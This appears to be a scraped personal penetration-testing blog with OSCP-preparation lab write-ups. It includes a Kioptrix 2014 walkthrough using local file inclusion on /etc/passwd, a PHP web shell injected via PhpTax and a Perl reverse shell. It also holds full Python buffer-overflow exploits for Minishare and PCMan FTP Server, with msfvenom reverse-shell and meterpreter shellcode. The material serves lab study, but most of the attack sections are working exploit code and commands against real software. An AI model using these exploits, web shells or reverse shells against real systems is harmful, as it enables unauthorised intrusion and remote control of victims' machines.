Mesh Software

Mesh Software

Softwares | Programms | Mobile Apps | Networking Projects

test

Breaking

Friday, 5 October 2018

How to setup BurpSuite Jython environment (Burp Extender)

October 05, 2018 0
How to setup BurpSuite Jython environment (Burp Extender)
SSL Scanner
This extension enables Burp to scan for SSL vulnerabilities.

Most of the testing logic are from testssl.sh. Heartbleed test and CCS Injection test code are modified from a2sv.

Vulnerabilities:

SSLv2 and SSLv3 connectivity
Heartbleed
CCS Injection
TLS_FALLBACK_SCSV support
POODLE (SSLv3)
Sweet32
DROWN
FREAK
LUCKY13
CRIME (TLS Compression)
BEAST
Check for weak ciphers
BREACH
Logjam
Author Pattara Teerapong and Meatasit Karakate
Version 1.2
Rating
Popularity
Last updated 15 August 2018







Why do i get this error when starting msf? msfconsole msfvenom

October 05, 2018 0
Why do i get this error when starting msf? msfconsole msfvenom







Commands:

root@kali:/usr/share/metasploit-framework/lib/msf/core/payload# gedit android.rb

#cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
 cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

Saturday, 29 September 2018

Remote Code Execution kioptrix 2014

September 29, 2018 0
Remote Code Execution kioptrix 2014

Remote Code Execution


 Get VMs IP:

 arp-scan --localnet

 Enumeration:

 nmap -A 192.168.85.145

LFI:

http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd
http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf
https://www.exploit-db.com/exploits/31173/


CURL:

curl -H "User-Agent:Mozilla/4.0" http://192.168.85.145:8080


RCE:

PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution
https://www.exploit-db.com/exploits/25849/
http://192.168.85.145:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>

http://192.168.85.145:8080/phptax/data/rce.php?cmd=id

uid=80(www) gid=80(www) groups=80(www)

http://192.168.85.145:8080/phptax/data/rce.php?cmd=perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.85.144:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



Privilege Escalation:

searchsploit freebsd 9.0
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
https://www.exploit-db.com/exploits/26368/

nc -lvp 1111 < 26368.c
nc -n 192.168.85.144 1111 > 26368.c
gcc 26368.c -o prives




Friday, 21 September 2018

Alhamdulillah! OSCP Passed

September 21, 2018 0
Alhamdulillah! OSCP Passed

Alhamdulillah!


With the grace of Almighty Allah and prayers of my family, I have passed #OSCP exam and i am one step closer to the target.

JazakAllah

#OSCP #tryharde #offsec

https://www.youracclaim.com/badges/ae4ec2d8-3559-495d-bc16-204667d7b851





Monday, 10 September 2018

Minishare Buffer Overflow Exploitation

September 10, 2018 0
Minishare Buffer Overflow Exploitation
Commands:

$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800
$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1800 -q 36684335
[*] Exact match at offset 1787
!mona jmp -r esp
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.85.141 LPORT=443 -b "\x00\x0d" -f python


Screenshots:









Source Code:

#!/usr/bin/python
import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.85.136',80))
pre_buff="GET "


buf =  ""
buf += "\xba\x61\xb3\x87\x4c\xda\xdb\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x55\x12\x83\xc5\x04\x03\x34\xbd\x65"
buf += "\xb9\x4a\x29\xeb\x42\xb2\xaa\x8c\xcb\x57\x9b\x8c\xa8"
buf += "\x1c\x8c\x3c\xba\x70\x21\xb6\xee\x60\xb2\xba\x26\x87"
buf += "\x73\x70\x11\xa6\x84\x29\x61\xa9\x06\x30\xb6\x09\x36"
buf += "\xfb\xcb\x48\x7f\xe6\x26\x18\x28\x6c\x94\x8c\x5d\x38"
buf += "\x25\x27\x2d\xac\x2d\xd4\xe6\xcf\x1c\x4b\x7c\x96\xbe"
buf += "\x6a\x51\xa2\xf6\x74\xb6\x8f\x41\x0f\x0c\x7b\x50\xd9"
buf += "\x5c\x84\xff\x24\x51\x77\x01\x61\x56\x68\x74\x9b\xa4"
buf += "\x15\x8f\x58\xd6\xc1\x1a\x7a\x70\x81\xbd\xa6\x80\x46"
buf += "\x5b\x2d\x8e\x23\x2f\x69\x93\xb2\xfc\x02\xaf\x3f\x03"
buf += "\xc4\x39\x7b\x20\xc0\x62\xdf\x49\x51\xcf\x8e\x76\x81"
buf += "\xb0\x6f\xd3\xca\x5d\x7b\x6e\x91\x09\x48\x43\x29\xca"
buf += "\xc6\xd4\x5a\xf8\x49\x4f\xf4\xb0\x02\x49\x03\xb6\x38"
buf += "\x2d\x9b\x49\xc3\x4e\xb2\x8d\x97\x1e\xac\x24\x98\xf4"
buf += "\x2c\xc8\x4d\x5a\x7c\x66\x3e\x1b\x2c\xc6\xee\xf3\x26"
buf += "\xc9\xd1\xe4\x49\x03\x7a\x8e\xb0\xc4\x45\xe7\xef\x99"
buf += "\x2e\xfa\x0f\xa3\x15\x73\xe9\xc9\x79\xd2\xa2\x65\xe3"
buf += "\x7f\x38\x17\xec\x55\x45\x17\x66\x5a\xba\xd6\x8f\x17"
buf += "\xa8\x8f\x7f\x62\x92\x06\x7f\x58\xba\xc5\x12\x07\x3a"
buf += "\x83\x0e\x90\x6d\xc4\xe1\xe9\xfb\xf8\x58\x40\x19\x01"
buf += "\x3c\xab\x99\xde\xfd\x32\x20\x92\xba\x10\x32\x6a\x42"
buf += "\x1d\x66\x22\x15\xcb\xd0\x84\xcf\xbd\x8a\x5e\xa3\x17"
buf += "\x5a\x26\x8f\xa7\x1c\x27\xda\x51\xc0\x96\xb3\x27\xff"
buf += "\x17\x54\xa0\x78\x4a\xc4\x4f\x53\xce\xf4\x05\xf9\x67"
buf += "\x9d\xc3\x68\x3a\xc0\xf3\x47\x79\xfd\x77\x6d\x02\xfa"
buf += "\x68\x04\x07\x46\x2f\xf5\x75\xd7\xda\xf9\x2a\xd8\xce"


end_buff=" HTTP/1.1\r\n\r\n"
#Return address 7CA58265 is written like that because of little endian
buff = "A"*1787 + "\x65\x82\xA5\x7C"+"\x90"*20+buf
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

BAD CHARS:

buff = "A"*1787 +"B"*4
bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buff = buff+bad

Sunday, 9 September 2018

PCMan FTP Server Remote Buffer Overflow

September 09, 2018 0
PCMan FTP Server Remote Buffer Overflow
Commands:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.141 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z










eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]



Bad Chars:

payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")




Buf.py

#!/usr/bin/python
# Exploit: PCMan FTP Server 2.0.7 PUT Buffer Overflow
# Author: @xerubus
# CVE: 2013-4730
import sys, socket

if len(sys.argv) <= 1:
    print "Usage: python exploit.py [host] [port]"
    exit()

host = sys.argv[1]
port = int(sys.argv[2])

rubbish = "\x41" * 2008  # eip offset
eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]
nop = "\x90" * 30

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.77.43 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z

buf =  ""
buf += "\xdb\xcf\xbb\x55\x2e\x92\x41\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x54\x31\x5f\x18\x03\x5f\x18\x83\xc7\x51\xcc"
buf += "\x67\xbd\xb1\x92\x88\x3e\x41\xf3\x01\xdb\x70\x33\x75"
buf += "\xaf\x22\x83\xfd\xfd\xce\x68\x53\x16\x45\x1c\x7c\x19"
buf += "\xee\xab\x5a\x14\xef\x80\x9f\x37\x73\xdb\xf3\x97\x4a"
buf += "\x14\x06\xd9\x8b\x49\xeb\x8b\x44\x05\x5e\x3c\xe1\x53"
buf += "\x63\xb7\xb9\x72\xe3\x24\x09\x74\xc2\xfa\x02\x2f\xc4"
buf += "\xfd\xc7\x5b\x4d\xe6\x04\x61\x07\x9d\xfe\x1d\x96\x77"
buf += "\xcf\xde\x35\xb6\xe0\x2c\x47\xfe\xc6\xce\x32\xf6\x35"
buf += "\x72\x45\xcd\x44\xa8\xc0\xd6\xee\x3b\x72\x33\x0f\xef"
buf += "\xe5\xb0\x03\x44\x61\x9e\x07\x5b\xa6\x94\x33\xd0\x49"
buf += "\x7b\xb2\xa2\x6d\x5f\x9f\x71\x0f\xc6\x45\xd7\x30\x18"
buf += "\x26\x88\x94\x52\xca\xdd\xa4\x38\x82\x12\x85\xc2\x52"
buf += "\x3d\x9e\xb1\x60\xe2\x34\x5e\xc8\x6b\x93\x99\x2f\x46"
buf += "\x63\x35\xce\x69\x94\x1f\x14\x3d\xc4\x37\xbd\x3e\x8f"
buf += "\xc7\x42\xeb\x3a\xc2\xd4\xd4\x13\x87\xa9\xbd\x61\x28"
buf += "\xcb\x54\xef\xce\x7b\xf7\xbf\x5e\x3b\xa7\x7f\x0f\xd3"
buf += "\xad\x8f\x70\xc3\xcd\x45\x19\x69\x22\x30\x71\x05\xdb"
buf += "\x19\x09\xb4\x24\xb4\x77\xf6\xaf\x3d\x87\xb8\x47\x37"
buf += "\x9b\xac\x39\xb7\x63\x2c\xd0\xb7\x09\x28\x72\xef\xa5"
buf += "\x32\xa3\xc7\x69\xcd\x86\x5b\x6d\x31\x57\x6a\x05\x07"
buf += "\xcd\xd2\x71\x67\x01\xd3\x81\x31\x4b\xd3\xe9\xe5\x2f"
buf += "\x80\x0c\xea\xe5\xb4\x9c\x7e\x06\xed\x71\x29\x6e\x13"
buf += "\xaf\x1d\x31\xec\x9a\x1e\x36\x12\x58\x02\x9f\x7b\xa2"
buf += "\x02\x1f\x7c\xc8\x82\x4f\x14\x07\xad\x60\xd4\xe8\x64"
buf += "\x29\x7c\x62\xe8\x9b\x1d\x73\x21\x7d\x80\x74\xc5\xa6"
buf += "\xd5\xfa\x2a\x59\xda\xfc\x17\x8f\xe3\x8a\x50\x13\x50"
buf += "\x84\xeb\x36\xf1\x0f\x13\x64\x01\x1a"

evil = rubbish + eip + nop + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
s.send("PUT " + evil + "\r\n")
s.close()